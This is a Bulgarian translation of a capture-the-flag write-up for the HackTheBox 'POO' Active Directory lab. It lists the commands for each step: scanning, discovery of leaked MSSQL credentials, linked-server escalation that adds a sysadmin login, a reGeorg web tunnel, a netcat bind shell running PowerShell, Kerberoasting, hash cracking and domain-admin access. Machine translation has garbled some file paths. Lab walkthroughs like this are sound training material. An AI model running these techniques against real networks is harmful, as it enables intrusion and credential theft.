HackTheBoxendgame. Преминаване на лабораторията Професионални настъпателни операции. Pentest Active Directory

В тази статия ще анализираме преминаването не само на машина, а на цяла мини лаборатория от сайта HackTheBox.

Както е посочено в описанието, POO е проектиран да тества умения на всички етапи на атаки в малка среда на Active Directory. Целта е да компрометирате наличен хост, да ескалирате привилегиите и в крайна сметка да компрометирате целия домейн чрез събиране на 5 флага в процеса.

Връзката с лабораторията е чрез VPN. Препоръчително е да не се свързвате от работещ компютър или от хост, където има важни за вас данни, тъй като влизате в частна мрежа с хора, които знаят нещо за информационната сигурност 🙂

организационна информация
За да можете да научите за нови статии, софтуер и друга информация, създадох Телеграм канал и група за обсъждане на всякакви въпроси в района на ИИКБ. Също така вашите лични искания, въпроси, предложения и препоръки Ще разгледам и ще отговоря на всички..

Цялата информация се предоставя само за образователни цели. Авторът на този документ не поема никаква отговорност за щети, причинени на когото и да било в резултат на използването на знанията и методите, получени в резултат на изучаването на този документ.

Intro

Тази крайна игра се състои от две машини и съдържа 5 флага.

Описанието и адресът на наличния хост също са дадени.

Да започнем!

Разузнавателно знаме

Тази машина има IP адрес 10.13.38.11, който добавям към /etc/hosts.
10.13.38.11 poo.htb

Първата стъпка е да сканирате отворени портове. Тъй като сканирането на всички портове с nmap отнема много време, първо ще го направя с masscan. Ние сканираме всички TCP и UDP портове от интерфейса tun0 при 500pps.

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

Сега, за да получите по-подробна информация за услугите, които работят на портовете, нека стартираме сканиране с опцията -A.

nmap -A poo.htb -p80,1433

По този начин имаме IIS и MSSQL услуги. В този случай ще разберем истинското DNS име на домейна и компютъра. На уеб сървъра ни посреща началната страница на IIS.

Нека прегледаме директориите. Използвам gobuster за това. В параметрите посочваме броя на потоците 128 (-t), URL (-u), речника (-w) и разширенията, които ни интересуват (-x).

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

По този начин имаме HTTP удостоверяване за директорията /admin, както и наличния файл за съхранение на услугата за настолни компютри .DS_Store. .DS_Store са файлове, които съхраняват потребителски настройки за папка, като списък с файлове, местоположение на икона, избрано фоново изображение. Такъв файл може да се окаже в директорията на уеб сървъра на уеб разработчиците. Така получаваме информация за съдържанието на директорията. За това можете да използвате DS_Store робот.

python3 dsstore_crawler.py -i http://poo.htb/

Получаваме съдържанието на директорията. Най-интересното тук е директорията /dev, от която можем да видим източниците и db файловете в два клона. Но можем да използваме първите 6 знака от имената на файлове и директории, ако услугата е уязвима към IIS ShortName. Можете да проверите за тази уязвимост, като използвате IIS скенер за съкратени имена.

И намираме един текстов файл, който започва с "poo_co". Не знаейки какво да правя по-нататък, просто избрах от речника на директориите всички думи, които започват с "co".

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

И повторете с wfuzz.

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

И намерете точната дума! Разглеждаме този файл, запазваме идентификационните данни (съдейки по параметъра DBNAME, те са от MSSQL).

Предаваме знамето и напредваме с 20%.

Хъ знаме

Свързваме се с MSSQL, аз използвам DBeaver.

Не намираме нищо интересно в тази база данни, нека създадем SQL редактор и да проверим какви са потребителите.

SELECT name FROM master..syslogins;

Имаме двама потребители. Да проверим нашите привилегии.

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

Следователно няма никакви привилегии. Нека да видим свързаните сървъри, писах подробно за тази техника тук.

SELECT * FROM master..sysservers;

Така че намираме друг SQL сървър. Нека проверим изпълнението на командите на този сървър с помощта на openquery().

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');

И дори можем да изградим дърво на заявката.

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');

Факт е, че когато правим заявка към свързан сървър, заявката се изпълнява в контекста на друг потребител! Нека да видим какъв потребителски контекст изпълняваме на свързания сървър.

SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');

А сега да видим в какъв контекст се изпълнява заявката от свързания сървър към нашия!

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');

Следователно това е DBO контекст, който трябва да има всички привилегии. Нека проверим привилегиите в случай на заявка от свързан сървър.

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

Както виждате, имаме всички привилегии! Нека създадем нашия администратор по този начин. Но не ги пускат през openquery, нека го направим чрез EXECUTE AT.

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";

И сега се свързваме с идентификационните данни на новия потребител, наблюдаваме новата база данни с флагове.

Предаваме това знаме и отиваме по-нататък.

Флаг за връщане назад

Нека вземем обвивката с помощта на MSSQL, аз използвам mssqlclient от пакета impacket.

mssqlclient.py ralf:[email protected] -db POO_PUBLIC

Трябва да получим пароли и първото нещо, с което вече се запознахме, е сайтът. По този начин се нуждаем от конфигурация на уеб сървър (невъзможно е да хвърлим удобна обвивка, очевидно защитната стена работи).

Но достъпът е отказан. Въпреки че можем да прочетем файла от MSSQL, просто трябва да знаем какви езици за програмиране са конфигурирани. И в директорията MSSQL откриваме, че има Python.

След това няма проблем да прочетете файла web.config.

EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"

С намерените идентификационни данни отидете на /admin и вземете флага.

опорно знаме

Всъщност има някои неудобства от използването на защитна стена, но преглеждайки мрежовите настройки, забелязваме, че се използва и IPv6 протокол!

Добавете този адрес към /etc/hosts.
dead:babe::1001 poo6.htb
Нека отново сканираме хоста, но този път през IPv6.

А услугата WinRM е достъпна през IPv6. Нека се свържем с намерените идентификационни данни.

Има флаг на работния плот, предайте го.

P00ned флаг

След разузнаване на домакина с winpeas не намираме нищо особено. След това беше решено отново да се търсят пълномощия (аз също писах по тази тема Статия). Но не можах да получа всички SPN от системата чрез WinRM.

setspn.exe -T intranet.poo -Q */*

Нека изпълним командата чрез MSSQL.

По този начин получаваме SPN на потребителите p00_hr и p00_adm, което означава, че те са уязвими на атака като Kerberoasting. Накратко, можем да получим хешовете на техните пароли.

Първо трябва да получите стабилна обвивка от името на потребителя на MSSQL. Но тъй като ние сме ограничени в достъпа, имаме връзка с хоста само през портове 80 и 1433. Но е възможно да се тунелира трафик през порт 80! За това използваме следващо приложение. Нека качим файла tunnel.aspx в домашната директория на уеб сървъра - C: inetpubwwwroot.

Но когато се опитаме да получим достъп до него, получаваме грешка 404. Това означава, че *.aspx файловете не се изпълняват. За да стартирате файлове с тези разширения, инсталирайте ASP.NET 4.5, както следва.

dism /online /enable-feature /all /featurename:IIS-ASPNET45

И сега, при достъп до tunnel.aspx, получаваме отговор, че всичко е готово за работа.

Нека стартираме клиентската част на приложението, която ще пренасочва трафика. Ще препратим целия трафик от порт 5432 към сървъра.

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

И ние използваме прокси вериги, за да изпращаме трафика на всяко приложение през нашето прокси. Нека добавим това прокси към конфигурационния файл /etc/proxychains.conf.

Сега нека качим програмата на сървъра netcat, с който ще направим стабилен bind shell, и скрипта Извикайте Kerberoast, с който ще извършим Kerberoasting атаката.

Сега чрез MSSQL стартираме слушателя.

xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321

И се свързваме чрез нашето прокси.

proxychains rlwrap nc poo.htb 4321

И да вземем хешовете.

. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt

След това трябва да повторите тези хешове. Тъй като rockyou нямаше речник с данни за пароли, използвах ВСИЧКИ речници за пароли, предоставени в Seclists. За изброяване използваме hashcat.

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

И намираме и двете пароли, първата в речника dutch_passwordlist.txt, а втората в Keyboard-Combinations.txt.

И така, имаме трима потребители, отиваме на домейн контролера. Нека първо разберем адреса му.

Страхотно, научихме IP адреса на домейн контролера. Нека разберем всички потребители на домейна, както и кой от тях е администратор. За да изтеглите скрипта, за да получите информация PowerView.ps1. След това ще се свържем с помощта на evil-winrm, като посочим директорията със скрипта в параметъра -s. И след това просто заредете скрипта на PowerView.

Сега имаме достъп до всички негови функции. Потребителят p00_adm изглежда като привилегирован потребител, така че ще работим в неговия контекст. Нека създадем PSCredential обект за този потребител.

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

Сега всички команди на Powershell, където посочваме Creds, ще бъдат изпълнени от името на p00_adm. Нека покажем списък с потребители и атрибута AdminCount.

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

И така, нашият потребител е наистина привилегирован. Да видим към кои групи принадлежи.

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

Най-накрая потвърждаваме, че потребителят е администратор на домейн. Това му дава правото да влезе отдалечено в домейн контролера. Нека се опитаме да влезем с WinRM, използвайки нашия тунел. Бях объркан от грешките, издавани от reGeorg при използване на evil-winrm.

След това използваме друг, по-лесен, писменост за да се свържете с WinRM. Отворете и променете параметрите на връзката.

Опитваме се да се свържем и сме в системата.

Но знаме няма. След това погледнете потребителя и проверете настолните компютри.

В mr3ks намираме флага и лабораторията е завършена на 100%.

Това е всичко. Като обратна връзка коментирайте дали сте научили нещо ново от тази статия и дали ви е била полезна.

Можете да се присъедините към нас на Telegram. Там можете да намерите интересни материали, обединени курсове, както и софтуер. Нека съберем общност, в която ще има хора, които разбират много области на ИТ, тогава винаги можем да си помогнем по всякакви въпроси, свързани с ИТ и информационната сигурност.

Източник: www.habr.com